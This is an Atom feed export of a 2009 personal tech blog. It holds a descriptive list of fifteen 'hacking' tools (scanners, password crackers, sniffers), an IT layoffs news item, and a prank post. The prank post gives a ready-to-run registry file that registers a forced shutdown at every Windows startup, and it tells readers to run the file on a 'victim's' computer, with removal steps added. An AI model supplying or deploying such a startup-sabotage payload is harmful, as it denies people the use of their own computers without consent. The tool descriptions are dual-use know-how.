href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2213504296512168286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2213504296512168286'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/change-removable-disk-default-look.html' title='CHANGE REMOVABLE DISK DEFAULT LOOK'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4686175963004224288</id><published>2009-05-01T02:25:00.000-07:00</published><updated>2009-05-01T02:41:42.923-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>TOP 15 HACKING SOFTWARES</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SfrAnshNRUI/AAAAAAAAAJo/2QmI_qa44b4/s1600-h/qxp5ia.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 318px; height: 400px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SfrAnshNRUI/AAAAAAAAAJo/2QmI_qa44b4/s400/qxp5ia.jpg" alt="" id="BLOGGER_PHOTO_ID_5330784897144276290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1108619993; 	mso-list-type:hybrid; 	mso-list-template-ids:391014270 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:.25in; 	mso-level-number-position:left; 	margin-left:.25in; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="margin-left: 0.25in; text-indent: -3.5in;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;                                                                                                                                                                &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;Nmap&lt;/span&gt;&lt;/b&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;br /&gt;&lt;br /&gt;I think everyone has heard of this one, recently evolved into the 4.x series.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1.Nmap&lt;/span&gt; (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.&lt;br /&gt;&lt;br /&gt;Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;2. Nessus Remote Security Scanner&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;Recently went closed source, but is still essentially free. Works with a client-server framework.&lt;br /&gt;&lt;br /&gt;Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;3. John the Ripper&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Yes, JTR 1.7 was recently released!&lt;br /&gt;&lt;br /&gt;John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;4. Nikto&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).&lt;br /&gt;&lt;br /&gt;Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;5. SuperScan&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.&lt;br /&gt;&lt;br /&gt;If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;6. p0f&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;br /&gt;&lt;br /&gt;- machines that connect to your box (SYN mode),&lt;br /&gt;- machines you connect to (SYN+ACK mode),&lt;br /&gt;- machine you cannot connect to (RST+ mode),&lt;br /&gt;- machines whose communications you can observe.&lt;br /&gt;&lt;br /&gt;Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;7. Wireshark (Formely Ethereal)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.&lt;br /&gt;&lt;br /&gt;Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;8. Yersinia&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).&lt;br /&gt;&lt;br /&gt;The best Layer 2 kit there is.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;9. Eraser&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.&lt;br /&gt;&lt;br /&gt;An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;10. PuTTY&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;11. LCP&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.&lt;br /&gt;&lt;br /&gt;A good free alternative to L0phtcrack.&lt;br /&gt;&lt;br /&gt;LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;12. Cain and Abel&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;My personal favourite for password cracking of any kind.&lt;br /&gt;&lt;br /&gt;Cain &amp;amp; Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;13. Kismet&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.&lt;br /&gt;&lt;br /&gt;A good wireless tool as long as your card supports rfmon (look for an orinocco gold).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;14. NetStumbler&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.&lt;br /&gt;&lt;br /&gt;NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:&lt;br /&gt;&lt;br /&gt;Verify that your network is set up the way you intended.&lt;br /&gt;Find locations with poor coverage in your WLAN.&lt;br /&gt;Detect other networks that may be causing interference on your network.&lt;br /&gt;Detect unauthorized “rogue” access points in your workplace.&lt;br /&gt;Help aim directional antennas for long-haul WLAN links.&lt;br /&gt;Use it recreationally for WarDriving.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;15. hping&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.&lt;br /&gt;&lt;br /&gt;hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4686175963004224288?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4686175963004224288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/top-15-hacking-softwares.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4686175963004224288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4686175963004224288'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/top-15-hacking-softwares.html' title='TOP 15 HACKING SOFTWARES'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SfrAnshNRUI/AAAAAAAAAJo/2QmI_qa44b4/s72-c/qxp5ia.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7355745518093824794</id><published>2009-04-29T14:03:00.000-07:00</published><updated>2009-04-30T13:09:59.561-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>Shutdown ur friend's comp when everytime it starts</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SfjA26tjzCI/AAAAAAAAAJg/XCxjtrFyMPY/s1600-h/shut-down.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 300px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SfjA26tjzCI/AAAAAAAAAJg/XCxjtrFyMPY/s400/shut-down.jpg" alt="" id="BLOGGER_PHOTO_ID_5330222208698797090" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style="font-family: arial;font-family:&amp;quot;;font-size:12;"  &gt;Shutdown &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;ur&lt;/st1:city&gt;&lt;/st1:place&gt; friend's comp when everytime it starts&lt;br /&gt;Thats really easy.&lt;br /&gt;put this followin text in a .reg file and run it in the victims pc:&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"&lt;br /&gt;&lt;br /&gt;DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start-&gt;run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.&lt;br /&gt;You can also put this in a javascript code, just add this code to your webpage&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7355745518093824794?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7355745518093824794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/shutdown-ur-friends-comp-when-everytime.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7355745518093824794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7355745518093824794'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/shutdown-ur-friends-comp-when-everytime.html' title='Shutdown ur friend&apos;s comp when everytime it starts'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SfjA26tjzCI/AAAAAAAAAJg/XCxjtrFyMPY/s72-c/shut-down.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7846203591709494603</id><published>2009-04-28T14:24:00.001-07:00</published><updated>2009-04-28T14:26:40.266-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='general'/><title type='text'>IT sector may layoff over 1 lakh by Sept</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sfd0QXEhPUI/AAAAAAAAAJY/fVYTAzvmGqw/s1600-h/IT.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 400px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sfd0QXEhPUI/AAAAAAAAAJY/fVYTAzvmGqw/s400/IT.jpg" alt="" id="BLOGGER_PHOTO_ID_5329856508435971394" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="font-family: arial;"&gt;The Indian IT services sector may see up to five per cent layoffs -- amounting to more than one lakh job cuts -- over the next six months as companies focus more on cost-cutting due to persisting weakness in global demand, experts say. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;Companies may reduce workforce in this fiscal, mostly based on stringent performance criteria, experts added. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;"We expect the knowledge industry (IT) to see 3-5 per cent non-voluntary exits in the first two quarters of the financial year mainly in senior and middle levels," Deloitte Touche Tohmatsu Senior Director (Management Consultancy Services) P Thiruvengadam said. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;Given the fact that more than 22 lakh people work in the IT industry, five per cent non-voluntary exits would mean more than one lakh employees being shown the door by September. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;Nasscom estimates more than 22 lakh people were working in the Indian IT-BPO sector in FY2009 (till February), while indirect job creation is estimated at about eight million. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;International Management Institute (IMI) Director C S Venkata Ratnam said, "The IT sector is better off but it may see up to 4-5 per cent job losses in the first two quarters of this fiscal."&lt;/p&gt;  &lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7846203591709494603?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7846203591709494603/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/it-sector-may-layoff-over-1-lakh-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7846203591709494603'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7846203591709494603'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/it-sector-may-layoff-over-1-lakh-by.html' title='IT sector may layoff over 1 lakh by Sept'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/Sfd0QXEhPUI/AAAAAAAAAJY/fVYTAzvmGqw/s72-c/IT.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2896909680438820783</id><published>2009-04-27T14:14:00.001-07:00</published><updated>2009-05-22T10:25:18.719-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>BURNAWARE</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/SfYgYRf5aLI/AAAAAAAAAJQ/OPZQfGlVi_Q/s1600-h/boxshot_pro_big.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 218px; height: 300px;" src="http://3.bp.blogspot.com/_T53992hHLOM/SfYgYRf5aLI/AAAAAAAAAJQ/OPZQfGlVi_Q/s400/boxshot_pro_big.jpg" alt="" id="BLOGGER_PHOTO_ID_5329482810425698482" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="color: rgb(255, 255, 255);" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   